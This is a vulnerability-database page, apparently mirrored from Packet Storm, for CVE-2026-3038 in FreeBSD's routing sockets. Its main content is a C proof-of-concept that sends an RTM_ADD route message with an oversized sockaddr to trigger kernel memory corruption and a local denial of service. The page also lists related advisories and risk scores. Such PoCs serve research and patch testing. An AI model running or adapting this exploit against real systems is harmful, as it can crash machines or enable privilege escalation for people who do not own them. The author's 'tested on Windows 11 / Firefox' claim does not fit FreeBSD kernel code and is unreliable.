Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 FreeBSD Routing Socket Input Validation

🗓️ 26 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 132 Views

Tests FreeBSD routing socket input validation by crafting a route message add with an oversized sockaddr.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2026-3038
9 Mar 202612:25
attackerkb
Circl		CVE-2026-3038
25 Feb 202602:05
circl
CNNVD		FreeBSD 安全漏洞
9 Mar 202600:00
cnnvd
CVE		CVE-2026-3038
9 Mar 202612:25
cve
Cvelist		CVE-2026-3038 Local DoS and possible privilege escalation via routing sockets
9 Mar 202612:25
cvelist
EUVD		EUVD-2026-10334
9 Mar 202615:30
euvd
EUVD		EUVD-2026-10335
9 Mar 202615:30
euvd
FreeBSD		FreeBSD -- Local DoS and possible privilege escalation via routing sockets
24 Feb 202600:00
freebsd
FreeBSD Advisory		FreeBSD-SA-26:05.route
24 Feb 202600:00
freebsd_advisory
Tenable Nessus		FreeBSD : FreeBSD -- Local DoS and possible privilege escalation via routing sockets (fbc47390-11e9-11f1-8148-bc241121aa0a)
28 Feb 202600:00
nessus
Rows per page
=============================================================================================================================================
    | # Title     : FreeBSD Routing Socket Input Validation Analysis – Oversized sockaddr in RTM_ADD                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.freebsd.org/                                                                                                    |
    =============================================================================================================================================
    
    [+] Summary    :  PoC attempts to test the robustness of the FreeBSD routing socket subsystem by crafting a RTM_ADD message containing an 
                      intentionally oversized sockaddr structure (sa_len greater than the traditional sockaddr_storage limit of 128 bytes).
    				  
                      4 you https://packetstorm.news/files/id/216124/
    
    [+] POC   :  
    
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <net/route.h>
    #include <net/if.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <errno.h>
    
    #define ROUNDUP(a) \
        ((a) > 0 ? (1 + (((a) - 1) | (sizeof(long) - 1))) : sizeof(long))
    
    struct malicious_sockaddr {
        unsigned char  sa_len;    
        unsigned char  sa_family; 
        char           sa_data[254]; 
    };
    
    int main() {
        int s;
        char buf[1500];
        struct rt_msghdr *rtm;
        struct malicious_sockaddr *dst, *gw;
        int l;
    
        printf("[+] FreeBSD CVE-2026-3038 Local DoS PoC\n");
    
        s = socket(PF_ROUTE, SOCK_RAW, AF_UNSPEC);
        if (s < 0) {
            perror("[-] socket(PF_ROUTE) failed");
            return 1;
        }
    
        memset(buf, 0, sizeof(buf));
        rtm = (struct rt_msghdr *)buf;
        rtm->rtm_msglen = 0; 
        rtm->rtm_version = RTM_VERSION;
        rtm->rtm_type = RTM_ADD; 
        rtm->rtm_addrs = RTA_DST | RTA_GATEWAY;
        rtm->rtm_flags = RTF_UP | RTF_GATEWAY | RTF_STATIC;
        rtm->rtm_pid = getpid();
        rtm->rtm_seq = 42;
    
        dst = (struct malicious_sockaddr *)(rtm + 1);
        dst->sa_family = AF_INET;
        dst->sa_len = 180; 
        memset(dst->sa_data, 'A', 170);
    
        int dst_space = ROUNDUP(dst->sa_len);
        gw = (struct malicious_sockaddr *)((char *)dst + dst_space);
        gw->sa_family = AF_INET;
        gw->sa_len = sizeof(struct sockaddr_in);
        ((struct sockaddr_in *)gw)->sin_addr.s_addr = inet_addr("127.0.0.1");
    
        rtm->rtm_msglen = sizeof(struct rt_msghdr) + dst_space + ROUNDUP(gw->sa_len);
    
        printf("[*] Sending packet: msglen=%d, dst->sa_len=%d\n", rtm->rtm_msglen, dst->sa_len);
        printf("[!] Attempting to trigger kernel memory corruption...\n");
    
        if (write(s, buf, rtm->rtm_msglen) < 0) {
    
            fprintf(stderr, "[-] Result: %s\n", strerror(errno));
        } else {
            printf("[+] Packet accepted. If the system is vulnerable, it might crash now.\n");
        }
    
        close(s);
        return 0;
    }
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.17.5
EPSS0.00027
SSVC
FreeBSDrouting socketinput validationoversized sockaddrroute message addproof concept
132